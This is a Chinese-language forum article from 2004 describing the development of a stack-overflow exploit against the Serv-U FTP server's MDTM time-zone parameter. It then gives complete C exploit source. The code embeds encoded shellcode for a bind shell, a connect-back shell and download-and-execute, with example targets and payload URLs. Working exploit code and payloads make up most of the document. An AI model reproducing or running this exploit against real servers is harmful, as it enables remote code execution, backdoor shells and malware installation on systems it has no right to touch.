Serv-U MDTM Time Zone Exploit
创建时间:2004-02-27
文章属性:转载
文章提交: velvet (zodiacsoft_at_hotmail.com)
论坛登陆名: SWAN
提交者邮件地址: ????
提交者QQ号码: ????
版权:文章属中华安全网 http://www.safechina.net和作者共同所有,转载请注明出处!!
标题: Serv-U MDTM Time Zone Exploit
我用的Serv-U 5.0来测试,先构造了一个很长的时区,发现居然没有反应,反复缩短时区长度后,感觉似乎第一个空格的出现位置不能太靠后时才能触发。我猜可能命令的长度有限制,至少是被截断过再处理的,如果第一个空格出现的位置太靠后,Serv-U就以为是在查询一个长文件的修改日期,溢出就不会触发了。
于是我又回来搭了个exploit的架子,以能够触发的字符串构造的。以常规的方法确定了ret点后,用Ollydbg连接到Serv-U守护进程,看在异常处理的时候发生了些什么。结果是和想象中的一样,在一步一步地跟踪到call ebx,然后nop nop jmp 4到常规方法的应该是shellcode的地方时,我仔细数了数当前eip位置附近的内容和发送的原始字符串相同的字节数,好像是连前面加起来一共是294字节,毫无疑问的,发送数据被截断了。
这时候的第一个反应是马上去找tiny shellcode,不过很遗憾,实在是没有找到。我又翻了一下eyas的WS_FTP的那篇文章,觉得应该很像,但是那个可以有512字节的自由发挥空间,无论如何,294字节似乎少了一点。这时候大约是11点了,我打算先回去睡觉,因为看了一天的动画,满脑袋装的都是斯卡(Scar?)的恶心嘴脸,怎么写集中不了精神。
第二天过来的时候,我想试试能不能在内存中找到原始的buffer。这次我在一个超长的MTDM命令后面加了SWAN作为标记,溢出触发的时候我搜索了一下,果然在edi附近发现了原始的数据,而且似乎还有好几个拷贝。这个时候寄存器ebx/esi/edi/ebp/esp几乎都在11xxxxx附近,从这些开始往后找应该能够找到没有经过加工处理的原始数据,我觉得这个exploit应该马上可以完成了。
我的想法是把一个标记作为完整性的判断,比如buffer最后的“SWAN”,然后向前搜索到real shellcode的头,最后跳转过去执行。为了保证溢出的安全触发,我把搜索的search code放到了时区中,而把real shellcode放到了文件名中。附带说一句,这里要一个符合文件名编码的shellcode,好在前面的site chmod的时候已经解决了这个问题,直接拿来用就可以。
search code还是有点考虑的,如果是很完美的话,应该是动态定位当前位置,接管异常处理,利用奇偶校验和来判断原始buffer是否完整等等。不过越想问题越来越多,我又本来就是个懒人,做这些东西岂不是要我的命,干脆做个马马虎虎能够将就过去的就可以了。为了能够通用,ret地址没有用call ebx的0x7FFA4A1B(这玩意儿到了XP下面不行的),而是用的lion上一次site chmod中给的pop/pop/ret地址0x7ffa1571。这个据说能够连win2k3都搞定,我是没有机器可以测试,只在英文版的XP和中文版的2k下面看了一下,确实是可以用。不过用这个的话edi被改掉了,加上XP等异常处理中call ecx后ebx成了0x00000000,我就从esp开始向下搜索的,测试了一个Win2K和一个WinXP,都能找到。
废话就不用多说,跟进去看看就知道了。Search code是这样:
//"/xCC" // int3 ; for test :-))
"/x8B/xDC" // mov ebx, esp ; "pop ebx" is also OK
"/xB8/x52/x57/x41/x4E" // mov eax, 4E415753h
"/x40" // inc eax ; eax eq "SWAN" now
"/x43" // inc ebx
"/x39/x03" // cmp [ebx], eax
"/x75/xFB" // jne -5 ; search "SWAN"
"/xB8/x90/x90/x90/x90" // mov eax, 90909090h
//"/xCC" // int3 ; for test
"/x4B" // dec ebx
"/x39/x03" // cmp [ebx], eax
"/x75/xFB" // jne -5 ; search nop/nop/nop/nop
"/xFF/xD3" // call ebx
"/x20/x20"; // <SP> to ensure the overflow
大概意思就是找SWAN,找到后向前找到连续的4个nop,以次确定完整的shellcode的地址,然后跳过去执行,后面两个空格(0x20)的意思嘛,前面已经说过了~
完整一点的exploit是这样子,不用写权限,能够登陆即可。我没有测试几台机器(自己用的三台加一个虚拟机),不知道会不会有其他的未发现的问题——毕竟我是纯黑盒连蒙带猜测试的,一丁点反汇编都没有去看。还有一句话,Serv-U 5.0以下的方法要简单些,但这种方法对从3.x开始的东西都有效果,如果你觉得ret地址不爽,请自己改。这个对中文版的2k/XP/2k3有效。
/*
Serv-U allows a MDTM command that less than 294 bytes, it is too short to exploit.
However, we could send a MDTM command as long as we wish, and we can easily find our
raw buffer in the memory. To be brief, you can find that near [edi] when overflow
happened. So search from the edi, and you can exploit it.
My way to exploit this could be described as follow:
+------+----------------------+---------+------+---------+
| MDTM | long buffer with '+' | buffer1 | <SP> | buffer2 |
+------+----------------------+---------+------+---------+
buffer1:
+--------------+--------------------+-------------------+
|nop nop jmp 4 | addr of "call ebx" | short search code |
+--------------+--------------------+-------------------+
buffer2: (as the filename)
+----------------+----------------+-------------+
|flag 0x90909090 | real shellcode | flag 'SWAN' |
+----------------+----------------+-------------+
The real shellcode must be a valid filename, see the "site chmod exploit" to get
more information about how to make the shellcode valid.
*/
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
void help(char *program)
{
printf ("=======================================================/r/n");
printf ("Serv-U MDTM Time Zone Stack Overflow Xploit v0.20 alpha/r/n");
printf (" For Serv-U 5.0 and below written by SWAN@SEU/r/n");
printf ("=======================================================/r/n/r/n");
printf ("Usage: %s <Host> <Port> <User> <Pass> /r/n", program);
printf (" %s <Host> <Port> <User> <Pass> <url>/r/n", program);
printf (" %s <Host> <Port> <User> <Pass> <Your IP> <Your port>/r/n", program);
printf ("e.g.:/r/n");
printf (" %s 127.0.0.1 21 test test/r/n", program);
printf (" %s 127.0.0.1 21 test test http://hack.co.za/swan.exe/r/n", program);
printf (" %s 127.0.0.1 21 test test 202.119.9.42 8111/r/n", program);
return;
}
unsigned char bpsc[]=
//shellcode flag, necessary!
"/x90/x90/x90/x90"
//decode code, suppose the ebx is near the encoded shellcode
"/x90/x8B/xC3/xBB/x51/x50/x50/x50/x4B/x40/x39/x18/x75/xFB/x40/x40"
"/x40/x33/xC9/x90/x90/x66/xB9/x7D/x01/x80/x34/x08/x99/xE2/xFA/x90"
"/x50/x50/x50/x50"
//encoded shellcode, binding port
"/x70/x95/x98/x99/x99/xC3/xFD/x38/xA9/x99/x99/x99/x12/xD9/x95/x12"
"/xE9/x85/x34/x12/xD9/x91/x12/x41/x12/xEA/xA5/x12/xED/x87/xE1/x9A"
"/x6A/x12/xE7/xB9/x9A/x62/x12/xD7/x8D/xAA/x74/xCF/xCE/xC8/x12/xA6"
"/x9A/x62/x12/x6B/xF3/x97/xC0/x6A/x3F/xED/x91/xC0/xC6/x1A/x5E/x9D"
"/xDC/x7B/x70/xC0/xC6/xC7/x12/x54/x12/xDF/xBD/x9A/x5A/x48/x78/x9A"
"/x58/xAA/x50/xFF/x12/x91/x12/xDF/x85/x9A/x5A/x58/x78/x9B/x9A/x58"
"/x12/x99/x9A/x5A/x12/x63/x12/x6E/x1A/x5F/x97/x12/x49/xF3/x9A/xC0"
"/x71/x1E/x99/x99/x99/x1A/x5F/x94/xCB/xCF/x66/xCE/x65/xC3/x12/x41"
"/xF3/x9C/xC0/x71/xED/x99/x99/x99/xC9/xC9/xC9/xC9/xF3/x98/xF3/x9B"
"/x66/xCE/x75/x12/x41/x5E/x9E/x9B/x99"
"/x86/x36" //<== Port xor 0x9999, default is 8111
"/xAA/x59/x10/xDE/x9D"
"/xF3/x89/xCE/xCA/x66/xCE/x69/xF3/x98/xCA/x66/xCE/x6D/xC9/xC9/xCA"
"/x66/xCE/x61/x12/x49/x1A/x75/xDD/x12/x6D/xAA/x59/xF3/x89/xC0/x10"
"/x9D/x17/x7B/x62/x10/xCF/xA1/x10/xCF/xA5/x10/xCF/xD9/xFF/x5E/xDF"
"/xB5/x98/x98/x14/xDE/x89/xC9/xCF/xAA/x50/xC8/xC8/xC8/xF3/x98/xC8"
"/xC8/x5E/xDE/xA5/xFA/xF4/xFD/x99/x14/xDE/xA5/xC9/xC8/x66/xCE/x79"
"/xCB/x66/xCE/x65/xCA/x66/xCE/x65/xC9/x66/xCE/x7D/xAA/x59/x35/x1C"
"/x59/xEC/x60/xC8/xCB/xCF/xCA/x66/x4B/xC3/xC0/x32/x7B/x77/xAA/x59"
"/x5A/x71/x76/x67/x66/x66/xDE/xFC/xED/xC9/xEB/xF6/xFA/xD8/xFD/xFD"
"/xEB/xFC/xEA/xEA/x99/xDA/xEB/xFC/xF8/xED/xFC/xC9/xEB/xF6/xFA/xFC"
"/xEA/xEA/xD8/x99/xDC/xE1/xF0/xED/xCD/xF1/xEB/xFC/xF8/xFD/x99/xD5"
"/xF6/xF8/xFD/xD5/xF0/xFB/xEB/xF8/xEB/xE0/xD8/x99/xEE/xEA/xAB/xC6"
"/xAA/xAB/x99/xCE/xCA/xD8/xCA/xF6/xFA/xF2/xFC/xED/xD8/x99/xFB/xF0"
"/xF7/xFD/x99/xF5/xF0/xEA/xED/xFC/xF7/x99/xF8/xFA/xFA/xFC/xE9/xED"
"/x99/xFA/xF5/xF6/xEA/xFC/xEA/xF6/xFA/xF2/xFC/xED/x99";
#define IP_OFFSET 253
#define PORT_OFFSET 248
unsigned char cbsc[]=
"/x90/x90/x90/x90"
"/x90/x8B/xC3/xBB/x51/x50/x50/x50/x4B/x40/x39/x18/x75/xFB/x40/x40"
"/x40/x33/xC9/x90/x90/x66/xB9/x7D/x01/x80/x34/x08/x99/xE2/xFA/x90"
"/x50/x50/x50/x50"
//connect back, from http://www.xfocus.net/articles/200307/574.html
"/x70/x6D/x99/x99/x99/xC3/x21/x95/x69/x64/xE6/x12/x99/x12/xE9/x85"
"/x34/x12/xD9/x91/x12/x41/x12/xEA/xA5/x9A/x6A/x12/xEF/xE1/x9A/x6A"
"/x12/xE7/xB9/x9A/x62/x12/xD7/x8D/xAA/x74/xCF/xCE/xC8/x12/xA6/x9A"
"/x62/x12/x6B/xF3/x97/xC0/x6A/x3F/xED/x91/xC0/xC6/x1A/x5E/x9D/xDC"
"/x7B/x70/xC0/xC6/xC7/x12/x54/x12/xDF/xBD/x9A/x5A/x48/x78/x9A/x58"
"/xAA/x50/xFF/x12/x91/x12/xDF/x85/x9A/x5A/x58/x78/x9B/x9A/x58/x12"
"/x99/x9A/x5A/x12/x63/x12/x6E/x1A/x5F/x97/x12/x49/xF3/x9A/xC0/x71"
"/xE9/x99/x99/x99/x1A/x5F/x94/xCB/xCF/x66/xCE/x65/xC3/x12/x41/xF3"
"/x9B/xC0/x71/xC4/x99/x99/x99/x1A/x75/xDD/x12/x6D/xF3/x89/xC0/x10"
"/x9D/x17/x7B/x62/xC9/xC9/xC9/xC9/xF3/x98/xF3/x9B/x66/xCE/x61/x12"
"/x41/x10/xC7/xA1/x10/xC7/xA5/x10/xC7/xD9/xFF/x5E/xDF/xB5/x98/x98"
"/x14/xDE/x89/xC9/xCF/xAA/x59/xC9/xC9/xC9/xF3/x98/xC9/xC9/x14/xCE"
"/xA5/x5E/x9B/xFA/xF4/xFD/x99/xCB/xC9/x66/xCE/x75/x5E/x9E/x9B/x99"
"/x9E/x24/x5E/xDE/x9D/xE6/x99/x99/x98/xF3/x89/xCE/xCA/x66/xCE/x65"
"/xC9/x66/xCE/x69/xAA/x59/x35/x1C/x59/xEC/x60/xC8/xCB/xCF/xCA/x66"
"/x4B/xC3/xC0/x32/x7B/x77/xAA/x59/x5A/x71/x9E/x66/x66/x66/xDE/xFC"
"/xED/xC9/xEB/xF6/xFA/xD8/xFD/xFD/xEB/xFC/xEA/xEA/x99/xDA/xEB/xFC"
"/xF8/xED/xFC/xC9/xEB/xF6/xFA/xFC/xEA/xEA/xD8/x99/xDC/xE1/xF0/xED"
"/xC9/xEB/xF6/xFA/xFC/xEA/xEA/x99/xD5/xF6/xF8/xFD/xD5/xF0/xFB/xEB"
"/xF8/xEB/xE0/xD8/x99/xEE/xEA/xAB/xC6/xAA/xAB/x99/xCE/xCA/xD8/xCA"
"/xF6/xFA/xF2/xFC/xED/xD8/x99/xFA/xF6/xF7/xF7/xFC/xFA/xED/x99";
unsigned char dehead[]=
"/x90/x90/x90/x90"
"/x90/x8B/xC3/xBB/x51/x50/x50/x50/x4B/x40/x39/x18/x75/xFB/x40/x40"
"/x40/x33/xC9/x90/x90/x66/xB9/xF0/x01/x80/x34/x08/x99/xE2/xFA/x90"
"/x50/x50/x50/x50"
//download & execute, modified slightly...
"/x70/x4D/x99/x99/x99/xC3/x21/x95/x69"
"/x64/xE6/x12/x99/x12/xE9/x85/x34/x12/xD9/x91/x12/x41/x12/xEA/xA5"
"/x9A/x6A/x12/xEF/xE1/x9A/x6A/x12/xE7/xB9/x9A/x62/x12/xD7/x8D/xAA"
"/x74/xCF/xCE/xC8/x12/xA6/x9A/x62/x12/x6B/xF3/x97/xC0/x6A/x3F/xED"
"/x91/xC0/xC6/x1A/x5E/x9D/xDC/x7B/x70/xC0/xC6/xC7/x12/x54/x12/xDF"
"/xBD/x9A/x5A/x48/x78/x9A/x58/xAA/x50/xFF/x12/x91/x12/xDF/x85/x9A"
"/x5A/x58/x78/x9B/x9A/x58/x12/x99/x9A/x5A/x12/x63/x12/x6E/x1A/x5F"
"/x97/x12/x49/xF3/x9D/xC0/x71/xC9/x99/x99/x99/x1A/x5F/x94/xCB/xCF"
"/x66/xCE/x65/xC3/x12/x41/xF3/x98/xC0/x71/xA4/x99/x99/x99/x1A/x5F"
"/x8A/xCF/xDF/x19/xA7/x19/xEC/x63/x19/xAF/x19/xC7/x1A/x75/xB9/x12"
"/x45/xF3/xB9/xCA/x66/xCE/x75/x5E/x9D/x9A/xC5/xF8/xB7/xFC/x5E/xDD"
"/x9A/x9D/xE1/xFC/x99/x99/xAA/x59/xC9/xC9/xCA/xCF/xC9/x66/xCE/x65"
"/x12/x45/xC9/xCA/x66/xCE/x69/xC9/x66/xCE/x6D/xAA/x59/x35/x1C/x59"
"/xEC/x60/xC8/xCB/xCF/xCA/x66/x4B/xC3/xC0/x32/x7B/x77/xAA/x59/x5A"
"/x71/xBE/x66/x66/x66/xDE/xFC/xED/xC9/xEB/xF6/xFA/xD8/xFD/xFD/xEB"
"/xFC/xEA/xEA/x99/xDE/xFC/xED/xCA/xE0/xEA/xED/xFC/xF4/xDD/xF0/xEB"
"/xFC/xFA/xED/xF6/xEB/xE0/xD8/x99/xCE/xF0/xF7/xDC/xE1/xFC/xFA/x99"
"/xDC/xE1/xF0/xED/xC9/xEB/xF6/xFA/xFC/xEA/xEA/x99/xD5/xF6/xF8/xFD"
"/xD5/xF0/xFB/xEB/xF8/xEB/xE0/xD8/x99/xEC/xEB/xF5/xF4/xF6/xF7/x99"
"/xCC/xCB/xD5/xDD/xF6/xEE/xF7/xF5/xF6/xF8/xFD/xCD/xF6/xDF/xF0/xF5"
"/xFC/xD8/x99";
//" http://127.0.0.1/hello.exe"
//"/x80";
unsigned char desc[500]={0};
void main(int argc, char *argv[])
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
int nTimeout = 1000;
if(argc != 5 && argc != 6 && argc != 7)
{
help(argv[0]);
return;
}
if(argc == 6)
{
//initialize the download & execute shellcode
//shellcode head + ((url + 0x80) xor 0x99 ) <==all for damned ':'
memset(desc, 0, 500);
memcpy(desc, dehead, sizeof(dehead));
char url[255];
strcpy(url, argv[5]);
strcat((char*)url, "/x80");
for(unsigned int j=0; j < strlen(url); j++)
url[j] = url[j]^'/x99';
strcat((char*)desc, url);
}
if(argc == 7)
{
unsigned short port = htons(atoi(argv[6]))^(u_short)0x9999;
unsigned long ip = inet_addr(argv[5])^0x99999999;
memcpy(&cbsc[PORT_OFFSET], &port, 2);
memcpy(&cbsc[IP_OFFSET], &ip, 4);
}
if(WSAStartup(0x0101,&wsaData) != 0)
{
printf("error starting winsock..");
return;
}
if((he = gethostbyname(argv[1])) == 0)
{
printf("Failed resolving '%s'",argv[1]);
return;
}
host.sin_port = htons(atoi(argv[2]));
host.sin_family = AF_INET;
host.sin_addr = *((struct in_addr *)he->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("Failed creating socket");
return;
}
if ((connect(s, (struct sockaddr *) &host, sizeof(host))) == -1)
{
printf("Failed connecting to host/r/n");
return;
}
setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char*)&nTimeout,sizeof(nTimeout));
char buff[50000]={0};
memset(buff, 0, sizeof(buff));
char szUser[255] = {0};
strcpy(szUser, "USER ");
strcat(szUser, argv[3]);
strcat(szUser, "/r/n");
char szPass[255] = {0};
strcpy(szPass, "PASS ");
strcat(szPass, argv[4]);
strcat(szPass, "/r/n");
int bread = recv(s,buff,sizeof(buff),0);
if(bread == -1)
{
closesocket(s);
printf("No response... Perhaps it has been hacked!/r/n");
return;
}
printf(buff);
//send user
send(s, szUser, strlen(szUser), 0);
memset(buff, 0, sizeof(buff));
recv(s, buff, sizeof(buff), 0);
printf(buff);
//send pass
send(s, szPass, strlen(szPass), 0);
memset(buff, 0, sizeof(buff));
recv(s, buff, sizeof(buff), 0);
printf(buff);
if(buff[0] == '5')
{
closesocket(s);
printf("Authentication failed!/r/n");
return;
}
char xploit[1500] = {0};
char head[] = "MDTM 19811102172800+In_My_Dream_I_Always_See_You_Soar_Above_The_Sky";
/*************************************************************************
Search the "SWAN" to ensure the buffer is intact, then search backwards
to find the head of shellcode.
*************************************************************************/
char search[] = //"/xCC" // int3 (for test)
"/x8B/xDC" // mov ebx, esp
"/xB8/x52/x57/x41/x4E" // mov eax, 4E415753h
"/x40" // inc eax
"/x43" // inc ebx
"/x39/x03" // cmp [ebx], eax
"/x75/xFB" // jne -5
"/xB8/x90/x90/x90/x90" // mov eax, 90909090h
//"/xCC" // int3 (for test)
"/x4B" // dec ebx
"/x39/x03" // cmp [ebx], eax
"/x75/xFB" // jne -5
"/xFF/xD3" // call ebx
"/x20/x20"; // <SP> to ensure the overflow
memset(xploit, 0, sizeof(xploit));
strcpy(xploit, head);
*((int*)(xploit + strlen(head) + 0)) = 0x04EB9090; //nop nop jmp 4
*((int*)(xploit + strlen(head) + 4)) = 0x7ffa1571;//0x7FFA4A1B; //jmp ebx
// copy the search code
memcpy(xploit + strlen(head) + 8, search, sizeof(search));
// copy the shellcode
if(argc == 5)
memcpy(xploit + strlen(head) + 8 + strlen(search), bpsc, sizeof(bpsc));
if(argc == 6)
memcpy(xploit + strlen(head) + 8 + strlen(search), desc, strlen((char*)desc));
if(argc == 7)
memcpy(xploit + strlen(head) + 8 + strlen(search), cbsc, sizeof(cbsc));
// copy the flag. SWAN? It's me~
strcat(xploit, " SWAN/r/n");
//printf(xploit);
send(s, xploit, strlen(xploit), 0);
memset(buff, 0, sizeof(buff));
bread = recv(s, buff, sizeof(buff), 0);
if(bread == -1)
{
closesocket(s);
if(argc == 5)
printf("Success! Try connect port 8111 to get your shell.../r/n");
if(argc == 6)
printf("Success! Host has download and execute the program.../r/n");
if(argc == 7)
printf("Success! See your nc.exe.../r/n");
return;
}
printf("Failed... Perhaps it has been patched!/r/n");
closesocket(s);
return;
}
839
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
